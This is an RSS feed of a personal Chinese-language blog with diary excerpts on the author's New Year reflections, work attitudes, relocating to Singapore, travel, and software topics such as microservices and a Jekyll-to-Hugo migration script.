<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Daily on wrfly&#39;s blog</title>
    <link>https://wrfly.kfd.me/tags/daily/</link>
    <description>Recent content in Daily on wrfly&#39;s blog</description>
    <generator>Hugo -- gohugo.io</generator>
    <lastBuildDate>Wed, 02 Jan 2019 00:11:29 +0800</lastBuildDate>
    
	<atom:link href="https://wrfly.kfd.me/tags/daily/index.xml" rel="self" type="application/rss+xml" />
    
    
    <item>
      <title>2019-1-1</title>
      <link>https://wrfly.kfd.me/posts/2019-1-1/</link>
      <pubDate>Wed, 02 Jan 2019 00:11:29 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/2019-1-1/</guid>
      <description>又是一年过去了。越发感觉时间过的更快了，恍恍惚惚一年又过去了，还记得去年最后一天换了博客的主题，眨眼间已经用了一年了。新电脑也用了一年半了，哈哈，感觉还跟新的一样。
这一年也是发生了很多事，比如去海边旅游，比如复合又分手，比如来坡县工作，比如去马来旅游，比如写了几个小项目，比如又长了一岁。
 展望下一年呢，想着能够去外地看看转转，特别想看银河星空，也想尝一下新鲜玩意儿，如果有机会最好能出个国，自己或者结伴都可以，再认识几个新朋友，涨点工资，多积累点经验，多干点正事儿，在有时间就多看几本书，然后抽空去跑步，每天晚上减减肚子，把自己充实起来，一年也就差不多了。
人啊，就怕一个熬，厚积而薄发，积跬步以至千里。
当然了，少熬夜。
 一年前立下的flag，好像没有看几本书，不过倒是在追一圈超人的漫画，也去了海边玩，但是没有看到星空银河，听说北京附近的郊区就可以，但是我已经不在那里了。除了工作上的同事，也没有认识几个新朋友，好像在一个app上认识了几个，不过也都删掉了，什么都没变成。工资是涨了，但这边房租也很贵。经验好像积累了，因为看以前自己写的代码能感觉到垃圾了哈哈哈，也挖了几个坑，现在还没填完，算是正事儿吧。也没有坚持跑步，总是以天气不好为借口，但在工人体育馆外面跑圈还是比较过瘾的，我能回忆起夕阳，还有散步去日坛公园，在最高处的小亭子上看日落。
没想到自己真的出国了，一年以前办的护照派上了用场，在这边也办了健身卡，每天中午都去健身，略微能看出效果了，因为每天晚上都能感到饿。但是在这边好像也没什么意思，没有朋友一起出去玩，出去吃火锅，吃烧烤，喝啤酒了。
最重要的，我还是在熬夜，好像更变本加厉了一些。原来是偶尔两点，现在，每天两点半。希望在2019能够实现不熬夜吧。
办了北京公园年卡，用了8个月，好像回本了，因为老去颐和园来着。离开北京前还带姥爷和两个妹妹来北京玩了四五天，带他们吃了好吃的，看了好玩的，以后陪他们的日子越来越少了，姥爷七十啦。
其实还有好多没有实现，现在就觉得，想起来再说吧，就如保险，就如看书。蛮想带爸妈出去玩的，哪怕国内也好。
技术上，还是只会golang，rust的网页都打开了好几个月了，也不知道自己为什么没动力去学，写的代码越来越多了，希望bug也越来越少。也希望能够把挖的坑都填起来，不要拖到2020。哇，2020，曾经感觉很遥远的样子，但现在这不已经2019了。真是，时间都去哪儿了。
忽然又想到买的基金，17年11月买的，到现在浮亏3k，很难过但是又没办法，整个股市的跌宕都被我赶上了，还记得去年fred让我卖，我怎么就没听老人言呢。不知道能装死到什么时候，反正不会再碰这个了。
昨天晚上去了滨海广场，看了“国家级”的烟花表演，很酷炫，但是站等了三个多小时，脚很累。由于人太多了，导致网络也很差，跟613开群语音都不行，但也算是跨年夜有这帮人的陪伴了哈哈哈，过年回国给他们带吃的。旁边还站了一个小姑娘，挺好看的，然后我就在2019年的头几分钟鼓起勇气去要了联系方式，然后第二天（也就是今天）被告知人家有男朋友，但带着单身戒指有男朋友的，还是第一次见，我还特意查了一下右手食指的戒指，确认是单身，然。挺搞笑的，原以为忘记旧爱的方式是找一个新欢，但好像冥冥中就是不想让我忘记她，虽然也渐渐记不清她的好了。前一阵子Big Day Out的时候也是，没中奖也就罢了，还让我碰到一个有男朋友且即将结婚的笑得很甜的女孩子，我为什么知道这么多？因为她邮件回复的呀。然后现在想想就很失落，真的，孤独才是人类最大的敌人，贫穷是次之的。
今天去macritchie reservoir，穿着凉鞋，被路上一直蜥蜴吓得半死。如果有朋友一起，至少是吓两个。今天不仅近距离看到了蜥蜴（比在动物园和植物园都近），还看到了野鸡，猴子，大乌龟，小蝴蝶，大树（当然别处也有）。其实很期待，但是也很害怕遇见蛇，在这边也没遇见过，最好是永远也别遇见。
现在每天的routine是，八点半起床（可能有很大出入），微波炉热几个饺子，九点多出门（最晚九点半），路上kindle看点东西，有时候是marter in go，有时候是王小波的小说，然后十点之前能到公司，喝个豆奶，开始一天的工作。十二点二十五去坐班车，到Galaxis的健身房呼哧呼哧的推拉举，然后吃饭，回公司。日复一日。日复一日啊。（我肯定呆不了几年就回国的，不仅仅是因为吃的）
今年也没有好好练字，虽然带了字帖过来，还买了草稿纸，但根本，没写几个字。可能在每天写一个小时的小玩意儿之后，把电脑盖上比较好。好多无用信息占用了时间和大脑，时间都浪费了，因为大脑记不住。
然后今年还收到一些人发来的邀请邮件，无非就是说在github上看到我了，有没有兴趣去他们那里工作，有两个都是区块链方向的，还有就是去写golang，但我深度怀疑他们不是猎头，而是内部推荐，但性质差不多，都会有钱拿。可气的是有个问我写不写Java，太搞了。不过话说，我离信息安全的道路是越来越来越远了，metasploit都可能拼错并且不会用了。burpsuit也好久没开了，日常没需求啊，就。
再次展望新的一年：一是好好健身，目标是20个引体向上；二是看完rust的教程（一年的时间，够长啦），最好能写点什么出来；三是能够遇上一个喜欢像我这样孤单平凡的人的人；四是能够带爸妈去个地方玩，最好在秋天，不冷也不热。
最后，少熬夜。</description>
    </item>
    
    <item>
      <title>Change-My-Attitude-Towards-Work</title>
      <link>https://wrfly.kfd.me/posts/change-my-attitude-towards-work/</link>
      <pubDate>Fri, 28 Dec 2018 21:31:54 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/change-my-attitude-towards-work/</guid>
      <description>我信奉真理胜过一切。
 我是一个嫉恶如仇的人，眼里容不下一点沙子，看不惯别人错误的行为，看不下项目里垃圾的代码。
我是一个程序员，这就意味着我以写代码为生，我用键盘敲出代码，为PM实现功能，给公司带来利益，以换取微薄的收入，支撑我生活所需的食物和水。但与此同时，我又跟别的程序员不太一样，我对代码质量的要求特别高，我怕犯错，每当有别人指出我的错误，我就谨小慎微，毕恭毕敬，有则改之，无则加勉，因为要对自己的每一行代码负责，所以每写一点东西，都会写上注释，文档，不确定的函数写好单元测试，还安装了拼写插件，以检查英语单词的拼写错误，代码超过两遍复用就抽象，类型定义和命名仔细斟酌，不写无用的代码，不写复杂的代码，如果我的代码别人看不懂，那么我首先要承担一半责任，我还对CI/CD特别挑剔，对commit message也异常执着，项目里总是要写一个Makefile和README，每个包里都用interface定义好接口，中规中矩，兢兢业业，如履薄冰，生怕自己的代码被别人鄙视，成为别人眼中的垃圾代码。
这种习惯是从小就养成的，每当错了一道题，如果是第二遍犯错，内心就会很自责，承受不住内心的拷问，所以我会把错误记在本子上，记在脑子里，就差刻在手臂上，告诫自己以后不要再犯。近乎自负。
可是并不是每个人都如此的对待错误，甚至不认为是错误。他们有他们自己的价值观，工作观，代码观。我不应该将自己苛刻的代码洁癖强加到别人身上，哪怕，写的是同一个项目里的代码。他们不写文档，不写注释，不写测试，不做抽象和重构，只是他们自己的事，跟任何人（除了项目负责人，因为他要合并PR和review代码）无关，当然其他人也要review代码，但，“严于律己，宽以待人”这句老祖宗留下来的经验教训应时刻被牢记，看到不爽的，睁一只眼闭一只眼也就过去了，生那个气干嘛。
就像有人喜欢把家里收拾的整整齐齐，干干净净；有人就是喜欢乱扔袜子，不打扫卫生，不整理衣柜；咱不能看见别人没擦嘴就强行按住人家给他擦嘴不是？
我对待生活的洁癖已经好一些了，但是对与代码的洁癖，还需要缓解缓解，不能因为别人写的不好还不改正就批评他，一是没资格，二是犯不上。不是有首歌：小燕子，穿花衣，年年春天来这里，我问燕子为什么，燕子说，管好你自己。
工作而已，完成任务就行了，还真以为有“全局观”，“大局意识”，“主人翁意识”，老板就会给你加钱？老板认识你是谁呐？要想升职加薪，跳槽才是最有效的方式，除此之外，就是站队和吹逼。
每天上班，下班，规划好工作，写好自己的代码就完事儿了，再怎么加班领导也不会给你发红包啊，每个公司都有自己的薪酬体系，哪那么容易啊。还有，没到手的承诺，千万别信，就像前女友说的爱你一样。
想到这里，心里就开朗了，工作嘛，没必要锱铢必较，“能者多劳”是资本家骗小孩子的，提高自身修养，跳出自己的安逸圈，做更好的自己，才是王道。
不懂的就问，不会的就学，合理安排自己的时间，一门心思扑在工作上不是啥值得骄傲的事儿。
加班？放他娘的臭狗屁！</description>
    </item>
    
    <item>
      <title>Two-Weeks-Here</title>
      <link>https://wrfly.kfd.me/posts/two-weeks-here/</link>
      <pubDate>Sun, 16 Sep 2018 17:03:44 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/two-weeks-here/</guid>
      <description>来这里两周了, 能够勉强正常生活了, 也可以循着地图到处看看了. 昨天去了东海岸公园, 虽然阴天, 看不到碧海蓝天, 但吹着海风感觉还不错.
入职第二天去拍照和录指纹, 然后五个工作日拿到EP (第二个周一), 一年的有效期. 然后就可以办手机卡, 银行卡了. 因为HR有催, 所以周四中午去了Vivocity办了手机卡, StarHub的更优惠一些, 流量多, 关键周末不限流量, 网速都差不多的, 在国内买的Singtel的卡, 其实是泰国的卡, 然后漫游到新加坡的, 不过都是singtel, 速度都很可以, 下载峰值能够到2.5M-3M/s, 在google搜索speedtest, 然后测试的. 之所以选择StarHub, 一是因为流量多(XS套餐在前6个月,每月有9G流量, 周末不限流量, 后六个月每月6G流量, 后一年优惠就结束了, 每月3G流量, 都是周末不限量), 二是因为公司跟StarHub有合作, 免去了开卡费和注册费, 这里很坑, 如果不去读他们的详细介绍, 是不知道有这个费用的, 大概S$10+S$37, 不管singtel还是starhub都有.
本想着那天中午一起把银行卡也办下来, 但时间不够了, 就只办了手机卡, 也是佩服自己蹩脚的英语, 能够顺利把手机卡搞定. 当天是一分钱没花的, 但他们会把账单寄到家里, 这里的水电费, 煤气费, 电话费, 网费都会通过信件寄给你. 所以需要pay the bill. 然后周五去办理银行卡, 他们说OCBC还不错, 我也跟风办了OCBC. 荷兰村的OCBC很小, 只有两个窗口, 大概等了30分钟, 然后办理用了20分钟. 这里的银行卡号跟账户号是分开的, 所以要打钱给某个人, 需要知道他的账户号, account number. 然后在手机app上可以设定GIRO或者还账单什么的, GIRO我理解为一个自动扣费的协议, 签了这个就会自动从银行划钱给公司.</description>
    </item>
    
    <item>
      <title>Singapore</title>
      <link>https://wrfly.kfd.me/posts/singapore/</link>
      <pubDate>Sun, 02 Sep 2018 00:22:55 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/singapore/</guid>
      <description>前些日子一直在准备来新加坡的事宜(主要是淘宝买东西, 然后我又有选择困难症, 所以一天也选择不了多少东西), 然后就没有怎么更新代码, github上也不绿了.
现在终于来到这个城市/国家了, 也算是安定下来了, 所以写点东西记录一下, 趁着昨天晚上的热乎劲.
准备 签证 由于公司给办的EP签证, 所以我做的事情其实不是很多, 就填了一下EP申请表(在此强烈推荐使用 &amp;ldquo;好签&amp;rdquo;, 在手机上就能在PDF文件上划拉签名, 填写资料, 省下了打印再复印, 北京住所附近的打印店一张纸两块钱, 简直坑爹), 发了护照的首页, 也没有提供什么学信网的证明, 也没提交学位证复印件, 有可能是新加坡政府对于上市公司的照顾, 对我而言签证程序还算简单, 等了大约三周, 下来了IPA, 也就是 &amp;ldquo;In-principle approval&amp;rdquo;, 打印出来, 拿着就可以出境和通关, 非常简单方便. 我之前还担心会有什么问题, 其实一本护照, 一封IPA就可以入境.
但新加坡对单身女性的签证很不友好, 很多旅行社都不给办理, 所以我女朋友就比较麻烦了, 月薪也达不到, 但是听说新加坡公民或者PR可以给担保入境, 直接在MOM的网站上申请就可以, 还没有尝试不过.
顺便说一下飞机上的小白卡, 飞机上发卡的时候我正好去了厕所, 所以就没我的, 我看别人都在填那个, 就按了呼叫灯, 让乘务员拿了一份过来. 全英文的其实也能填, 有些地方可以空着, 比如我是过去工作, 所以就没有离开新加坡的下一个城市, 也没有填Stay days, 在新加坡的住址也没有很严格的规范, 只要填上就可以了, 就我而言, 单词之间的空格就空了一个字符, 也不知道对不对, 但我确实是过关了.
住 在来之前, 除了签证(公司给办的), 最重要的事情就是住了, 可以在网上自己找, 但是会很麻烦, 包括合同什么的, 还有大家推荐的新浪 &amp;ldquo;狮城租房&amp;rdquo;, 上面有很多房源, 但我们不能过去看, 如果遇到一个好的房东还好, 如果遇到比较差的, 就会很麻烦.</description>
    </item>
    
    <item>
      <title>The-Meanings-of-Travel</title>
      <link>https://wrfly.kfd.me/posts/the-meanings-of-travel/</link>
      <pubDate>Sun, 05 Aug 2018 18:15:30 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/the-meanings-of-travel/</guid>
      <description>马上要离开北京了, 趁这个周末去了天津. 一直惦记着那边正宗的煎饼果子和相声. 出发之前还列了清单, 然而实际上50%都没达成. 有计划的旅行, 计划赶不上变化的旅途.
昨天晚上听完相声都10点了, 又在旁边的排档吃了饭, 从此将小龙虾拉黑, 一是麻烦, 二是没肉. 太不过瘾. 然后骑上自行车在黑暗中前行, 鼓楼那片都没灯了, 隐隐约约看到了鼓楼朝南的门上写着 &amp;ldquo;定南&amp;rdquo;, 又在东面发现了 &amp;ldquo;镇东&amp;rdquo;, 顿时觉得这个鼓楼不简单, 于是围着楼转了一圈, 北面写着 &amp;ldquo;拱北&amp;rdquo;, 西面写着 &amp;ldquo;安西&amp;rdquo;. 很有文化底蕴. 这种昏暗的&amp;rdquo;景色&amp;rdquo;, 以及我们后面去看的没有灯的 &amp;ldquo;天津眼&amp;rdquo;, 很少人能见到的, 但这也是城市的一部分, 天津的夜骑, 正如西安的夜骑和北京的夜骑, 能够深深感受到城市的魅力, 在昏暗中仿佛时间穿越了回去, 远离了嘈杂和喧嚣, 听这座城市的故事. (当然也要感谢共享单车)
今天还去了五大道, 路边听到一个老师傅拿着扩音器招揽游客, 以前我对这种讲历史的&amp;rdquo;小导游&amp;rdquo;都是嗤之以鼻, 但今天却有种冲动想请他带着我转一圈. 谈好价钱(八十)以后, &amp;ldquo;老天津&amp;rdquo;就带着我开始转了, 一人一辆车, 颇有意思. 讲了一些房子的主人, 房子的风格, 哥特, 意大利风格, 摩登风格, 现代风格, 听起来人家是备了课的. 这片区域是当时的英租界, 很多政客名流富豪大商军阀元帅都居住于此, 放现在就是富人区了. 房子设计的也是各有不同, 有的是买的地皮, 请外国设计师来设计, 有的是买的现房. 也有很多高级公寓, 建国以后收归国家, 然后分配给工人们了. 很多房子也变成了招待所, 机关幼儿园, 国企办公机构等等. 以前一直不理解招待所是干什么的, 直到今天看到招待所有很多党和国家领导人住过, 才知道, 原来是给大官们住宿的. 想想也是, 人家总不能住商业酒店.</description>
    </item>
    
    <item>
      <title>Happy-Birthday</title>
      <link>https://wrfly.kfd.me/posts/happy-birthday/</link>
      <pubDate>Tue, 08 May 2018 22:51:57 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/happy-birthday/</guid>
      <description>不如意事常八九, 可与人言无二三.
 今天又是寻常的一天, 只不过有点倒霉.
要租我房子的小姐姐变卦了, 所以我也只能跟我的新房东变卦. 可是我已经交了1k的定金, 所以就弄得很尴尬, 而且还白跑了一趟. 到现在也没个回复, 我想, 至少也能退个八百吧.
怪自己太心急, 看房子不到十分钟就匆匆忙忙的给了钱, 凭什么呀, 凭什么让我给定金我就给啊, 又不是我要被轰走, 我完全可以慢慢找房子的呀. 包子了这次.
而且也没跟新租户要定金什么的, 所以导致了这次很被动. 其实被动也不仅于此, 还在于, 我把定金给的太早, 房子确实好, 也大, 但6个人, 生活质量肯定会下降吧. 而且, 还没有桌子椅子, 如果在给钱之前把这些条件都提出来, 势必会好一些, 因为主动权在我这里, 我有谈判的资本. 但当一切都敲定的时候, 我就被踢出谈判桌了. 太年轻啊太年轻.
而且也怪自己太穷, 想方设法找到便宜而又近的房子. 但是每天一小时的通勤时间我完全可以承受啊, 相比每个月多300的房租, 与五个陌生人相处, 新的环境, 还要买桌子椅子, 我还是讨厌这些麻烦. 所以现在只好期待房东能给我一个好消息, 至少别是个坏消息.
主动权是个好东西啊, 受制于人很难受很难受, 各种憋屈, 各种委屈. 虽说人在江湖, 身不由己, 但还是要对自己好一点啊, 为了几百块钱而惆怅, 发怒, 真是蠢死了, 不值. 现在明白为什么大哥们总喜欢掌控一些事情了, 因为你只有拥有主动权, 你才有谈判的话语权, 别人才会尊重你, 尊重你的意见和想法, 不然, 别人凭什么跟你谈判呢, 你算什么呢. 讲理吗, 凭什么讲理啊. Naive!</description>
    </item>
    
    <item>
      <title>Panic</title>
      <link>https://wrfly.kfd.me/posts/panic/</link>
      <pubDate>Sun, 11 Mar 2018 23:12:32 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/panic/</guid>
      <description>I&amp;rsquo;m not going to talk about the panic in golang, I&amp;rsquo;m talking about panic in our life.
 今天偶然看到又一个研究生想要退学的消息. 评论也都是一边倒, 痛诉学校的种种不是, 制度的种种不好. 其实有点好笑, 因为很像键盘侠, 但的确又做不了什么, 更或者还会是委曲求全的那一群. &amp;ldquo;委曲求全&amp;rdquo; 这个词, 不知道在国外有没有, 又或者是中国人独特的发明创造, 我们五千年的文明历史, 的确是总结了一些经验, 和一大批丰富的词语.
想当初我还在学校论坛上发表过痛诉学校制度的帖子, 随声附和的人也不少, 批评我的也有很多, 现象很正常, 但我在想, 为什么没有第二个帖子, 为什么是我. 怎么也没有结论. 一来, 我不特殊, 二来我又穷苦出身, 三来还学习不好, 真真比不上其他的同学. 现在想想, 引用前几天别人对我的一个评价, &amp;ldquo;耿直&amp;rdquo;. 什么都往外说. 可我也好奇, 别人心里都在想什么. 忽然又想到, 很久没和别人谈心了.
再来说恐慌.
厌学也好, 退学也罢, 总之是不想继续下去了. 有点类似&amp;rdquo;周一不想上班&amp;rdquo;. 可能是学的东西没有成就感, 也或许是对未来没有希望, 反正, 看不到头. 我们总是对未知恐慌, 因为不知道前面是什么, 就像恐惧黑暗. 那位学长好像是因为导师的原因, 吐槽了导师的脾气, 经常换研究方向, 以及学术上的无所事事和&amp;rdquo;抢功劳&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>About-Love</title>
      <link>https://wrfly.kfd.me/posts/about-love/</link>
      <pubDate>Sat, 06 Jan 2018 19:57:01 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/about-love/</guid>
      <description>无论顺境还是逆境，富裕还是贫穷，健康还是疾病，快乐还是忧愁，我将一直爱你，珍惜你，对你忠实，直到永远。
喜今日两姓联姻，一堂缔约，良缘永结，匹配同称。看此日桃花灼灼，宜室宜家，卜他年瓜瓞绵绵，尔昌尔炽。谨以白头之约，书向鸿笺，好将红叶之盟，载明鸳谱。
  就算你拒绝了我，我对你也永远没有埋怨。但我不会再靠近了。如果你有求于我，我依然会鞠躬尽瘁。从今往后我会把喜欢藏起来，不再招摇过市了，我会努力过得好，希望你也是。
爱情不止是找一个人结伴生活，而是与对方共享自己的人生。
 如果说爱情只为了找一个人过日子，那我大可省去这笔麻烦，因为我可以自己过日子，吃饭睡觉看电影玩游戏听歌散步旅行拍照看书写字。
心目中的爱情应是，一起吃饭睡觉看电影玩游戏听歌散步旅行拍照看书写字。
什么包容理解信任依赖关心和爱，都是后话。前提得是互相欣赏。欣赏就是聊得来，别她说东你说西，她吃素你吃鸡。
姜太公钓鱼，愿者上钩。</description>
    </item>
    
    <item>
      <title>Last-Day-of-2017</title>
      <link>https://wrfly.kfd.me/posts/last-day-of-2017/</link>
      <pubDate>Sun, 31 Dec 2017 22:13:35 +0800</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/last-day-of-2017/</guid>
      <description>今天是2017年的最后一天，晚上吃了一包泡面，一根黄瓜，一个苹果，一会儿还要吃个橘子。（说好的减肥呢）
昨天晚上+今天的产出是一个新博客，当当当当，就是现在看到的这个了。 从Jekyll换到了Hugo，变了的是目录结构和内容，不变的还是markdown。
过程中有几个坑，在这里记录一下。
Tags的问题 Jekyll的tags可以用空格区分，但是在这里换成了hugo，就得用严格的yaml格式了，像以前这种的：
--- tags: daily blog --- 都得换成
--- tags: - daily - blog --- Title和创建时间的问题 以前写的东西，都是以文件名作为标题和创建时间，但在这里也得先在header中声明，老办法行不通了，必须要这样：
--- date: &amp;#34;2017-12-31T22:13:35+08:00&amp;#34; title: &amp;#34;Last-Day-of-2017&amp;#34; categories: - daily tags: - daily - blog --- 解决问题 原先的文件中是没有声明这些东西的，所以就的批量修改，一般没毛病的话，sed就能解决了：
# 增加date和title for f in *;do export T=&amp;#34;`echo &amp;#34;$f&amp;#34; | cut -d &amp;#34;-&amp;#34; -f4 | cut -d &amp;#34;.&amp;#34; -f1`&amp;#34; export D=$(date --date=`echo &amp;#34;$f&amp;#34; | cut -d &amp;#34;-&amp;#34; -f -3` +&amp;#34;%Y-%m-%d&amp;#34;) sed -i &amp;#34;s/post/post\ndate: $D\ntitle: $T/1&amp;#34; $f done #把原先的layout删掉 for f in *;do sed -i &amp;#34;1,10{/layout/d}&amp;#34; $f done # 把tags用[]括起来 for f in *;do cat &amp;#34;$f&amp;#34; | head -n10| grep &amp;#34;tags: &amp;#34; | grep -v &amp;#34;\[&amp;#34; &amp;amp;&amp;amp; echo $f &amp;amp;&amp;amp; sed -i &amp;#34;s/\(tags: \)\(.</description>
    </item>
    
    <item>
      <title>拆拆拆</title>
      <link>https://wrfly.kfd.me/posts/%E6%8B%86%E6%8B%86%E6%8B%86/</link>
      <pubDate>Thu, 19 Oct 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E6%8B%86%E6%8B%86%E6%8B%86/</guid>
      <description> 程序的拆拆拆 敏捷开发 &amp;amp; 快速迭代 去年实习的时候就听过这两个词，很时髦，很新颖。大体的理解就是，因为创业公司技术壁垒很低，大家都争分夺秒，所以新功能的开发必须要快，一个新的特性开发出来之后，进入一个快速迭代的流程，其实也就是开发-测试-发布的一个流程，通过自动化的手段，将人为干预降到最低，把从代码到交付这个流程贯通起来，快速上线。
技术壁垒这个东西，无非就是时间壁垒。曾经面试的时候跟一个创业公司的CEO聊过，他也给我灌输了这一点，当时我问他产品有没有壁垒，他就很坦然的说，半年。以一个时间跨度去衡量技术跨度，我觉得OK。同样一种服务，厉害一点的团队，可能半年开发完，那一般一点的团队，一年，一年半也能写个差不多。日光底下又没有新鲜事，无非就是写的好坏的问题嘛，但这些都可以通过优化，重构去解决。好的代码是重构出来的，我很同意这句话。
而敏捷开发，我理解为，拆拆拆。从定义上讲：
 敏捷开发是一种以人为核心、迭代、循序渐进的开发方法。在敏捷开发中，软件项目的构建被切分成多个子项目，各个子项目的成果都经过测试，具备集成和可运行的特征。换言之，就是把一个大项目分为多个相互联系，但也可独立运行的小项目，并分别完成，在此过程中软件一直处于可使用状态。
 项目的概念，可以是一个单纯的project，工程上的的projet，交付的产物是一个程序；但从项目经理的角度出发，一个项目则是可以给用户带来价值的一组服务。所以这里有点模糊，但我个人理解，项目就是repo，服务就是service，两者可以联系在一起，也可以不联系在一起，一个repo可以就是一个service，但也有可能是一个service的一部分。其实结合docker的stack和container的关系，就容易理解：stack中定义一组container，一个stack对外提供服务，但一个container组成的service也可以看作为一个stack。
敏捷开发即将原先的大项目拆分成一个一个的小项目，不同的小项目组合起来就是这个“大项目”，即“服务”。但也有可能，这个“大项目”也只是某个服务的一部分。小项目之间互相独立，只要定义好接口，不关心内部实现。这样就能以程序解耦为基础，在人员上解耦，大家互相独立的开发，写好需求，写清楚需求，这个IO流就跑起来了。
其实程序嘛，无非就是个IO，给个输入，程序给出输出。只不过大程序完成了很多事，小程序只做一件事而已。
也谈微服务 近些年，“微服务”这个词也挺时髦的。很幸运，一开始去的公司比较时尚，由于是做Docker服务的，所以接触Docker也还不晚。而Docker和微服务，我个人认为是紧密联系在一起的。
什么是微服务。我们知道服务是对外提供功能的一组程序，一个服务，或者说，公司的一组业务，是由很多不同的组件构成的，那微服务就是在组件这一个层次上（组件可以理解为特定的程序），把组建拆拆拆，把程序拆开，每个组件对外还是相同的功能，但是对内而言，已经七零八散了。在微服务构架里，“七零八散”并不是个贬义词，看似很小的程序在逻辑上都是有组织有纪律的。忽然又想起微信小程序了，看来总体的发展趋势还是微小化，一开始是服务器，虚拟机，后来有了虚拟空间，再后来GAE，SAE，Docker，还有亚马逊的lambda服务，大家都是朝着微小化的方向发展，我们把机器拆开，服务拆开，接口拆开，程序拆开，进程拆开，函数拆开，最后都变成一个个的IO。
就像是从一家家的小作坊，变成了工厂的流水线，每个人负责单一的功能，每个人都是对外提供一种服务，但由于这个服务比较小，所以就叫微服务。小作坊和工厂都是服务，不同的是，工厂的资源高度集中，工人稳定可靠（不会因为不上班而DOS），流水线分工明确，产品可追溯，流程可控制。一群工人组成的team，就像一群微服务组成的集群。
说到集群，就不得不说管理和调度，这也是一门博大精深的学问，可以看下google的borg系统。还有集群的监控，日志，存储，网络等等等等。又想起那天去头条面试的时候，那个老大问我对成千上万的容器怎么监控，metric有哪些，当时我竟然脑子短路，只说了alive这一个，哪怕uptime呢，最后他告诉我，还要有对请求的统计（可能是他就说了这一个，也有可能我只记住了这一个）。不过现在手头正做一个API的服务，audit啊，auth啊，cache啊，metrics啊，很涨经验。
拆拆拆 这个也是今天想到的，从程序分层，想到组件（component）分层，然后又回到了微服务。程序的分层，就是在逻辑和代码上做内部的解耦，不同的DAO，不同的Handler，不同的Type，都要一一区分，能抽象的都抽象，能解耦的都解耦，这样的好处是，在逻辑上很清晰，在测试方面也容易进行单元测试。
又想到一个“传递和全局变量”的问题。其实一直在纠结，因为程序经常会与数据库打交道，也就是DAO的处理，初始化handler的时候，到底是将new出来的DAO传递进去，还是在DAO中定义一个全局变量，当有handler需要与数据库交互的时候，直接调用这个全局变量呢。我代码看的也少，不了解别人是怎么做的，但经讨论认为，如果说DAO的session或者client能够保证并发安全，那么这个全局变量是没问题的。如果不能保证并发安全，那么就要么加锁（或者队列），要么就再new一个新的出来给handler用。这就要具体情况具体分析了，像influxdb的UDP的client，就可以每次调用的时候new一个出来。但既然其HTTP的client能够保证并发安全，那么全局变量的做法也是OK的。
拆程序不仅在逻辑上的分层很清晰，在流程上的层次也很明确。以后有新的功能开发，直接找到对应的module或者handler或者别的什么名字，在其基础上append代码就可以，如果有其他地方的改动，也只是小修小补，只要做好feature的unit test，其他的改动也不会有问题。
如果一个程序让人读起来很乱，那么就需要考虑重构，内部解耦，划分好调用层次，流程顺序等等。
实在不行，就重写吧。
扩展阅读  https://www.biaodianfu.com/tencent-agile.html http://agilemanifesto.org/iso/zhchs/principles.html 解析微服务架构 http://wiki.mbalib.com/wiki/%E6%95%8F%E6%8D%B7%E5%BC%80%E5%8F%91  </description>
    </item>
    
    <item>
      <title>20170908</title>
      <link>https://wrfly.kfd.me/posts/20170908/</link>
      <pubDate>Fri, 08 Sep 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/20170908/</guid>
      <description>发现近来话越来越多了，不知道是好事还是坏事。
但频繁的更新blog，却没有什么干货，难免有些罪恶感。
whatever，写给自己。
八月中旬“辞职”以后，空窗了两周，然后现在也快入职两周了。不得不感叹光阴似箭。
喜欢新的工作。也喜欢我的X1C。不烫手。
前两周还是第一次经历正式意义上的找工作，因为之前的实习经历也好，面试经历也好，都太顺风顺水了，毫无挫折，有如探曩取物。导致我对自己的评价过高，没能赶上预期。不过这也不是坏事，最终还是吃到了喜欢的巧克力，而且中间还去了故宫玩，去了颐和园，回了趟家，办了护照哈哈哈，事儿好多啊。然后还趁着没工作，着手自己的“分布式爬虫”，直到现在才完成了一个proxy，但鄙人感觉这东西还是很有用的，作为一个spider的组件。
好像对自己还是没有一个清晰的定位，但从做过的事情来看，也就属于platform这一组了，运维开发啊，搞点小事情啊，监控告警啊，集群分布式啊，balabala。好像，离黑客这条路是越来越远了，不过现在国家打的这么严，买个ss都被判刑，咱还是老实点吧。
总结一下前一个月的工作，跟着老大完成了core，主要工作量是补全了测试 :D 然后在做工程方面有很大的提升，全局观也开始形成了，导致在新的公司总想找事情做…… 写代码就跟写文章似的，也需要推敲琢磨，三天一重构这句话不是白说的。工作的过程，也就是提升自己的过程。有时候迫于某些原因在当时那样实现，但几天之后发现又有新的思路，那么就得refactor了，这样经过时间的沉淀，最终得到的可以说是一件工艺品，艺术品，而不仅仅是工具了。
 优秀的工程师同样是优秀的艺术家，有些艺术家的作品是挂在墙上的，有些艺术家的作品则跑在进程里。 &amp;mdash; 我。
 经历了两个多月的不明不白之后，终于藕断丝也断了。感情这种事情，跟工作一样，都是强求不来。工作的话还可以用薪水来补平内心的不满，但异地恋这种事情，唉。：（ 虽然说不要隔着屏幕对另一个人产生好感，但，希望我能找到更可爱更适合我的妹子吧 ：）
然后还闲的没事儿临摹了一个shadowsocks-qt5的 logo： http://wrfly.kfd.me/file/ss-qt5.svg 很清楚。
越来越觉得没地方去了，游戏也就那样，kill time而已，想去吃好吃的，但一个人总有些奇怪，都没个倾听的对象。国庆放假也买不到回家的票，回家能干什么呢，今中午薄哥说他认识个黄牛大哥，我想等计划好回家之后可以问问。好久没有在家过中秋节了，去年的中秋节晚上跟她还吵架了，历历在目啊唉。哦对，我还想着攒钱，每个月3k如何。也在考虑给爸妈买个养老保险之类的，或者等再工作一段时间之后？原先觉着zhihu啊，v2ex啊，都是很好的论坛，现在的话，只剩1024了。zhihu广告越来越多，v2ex上喷子和三观不合的人也越来越多了。我要找下一个可以刷时间的地方了，kindle？好主意。也想去星巴克坐一下午，那边网应该不差吧。
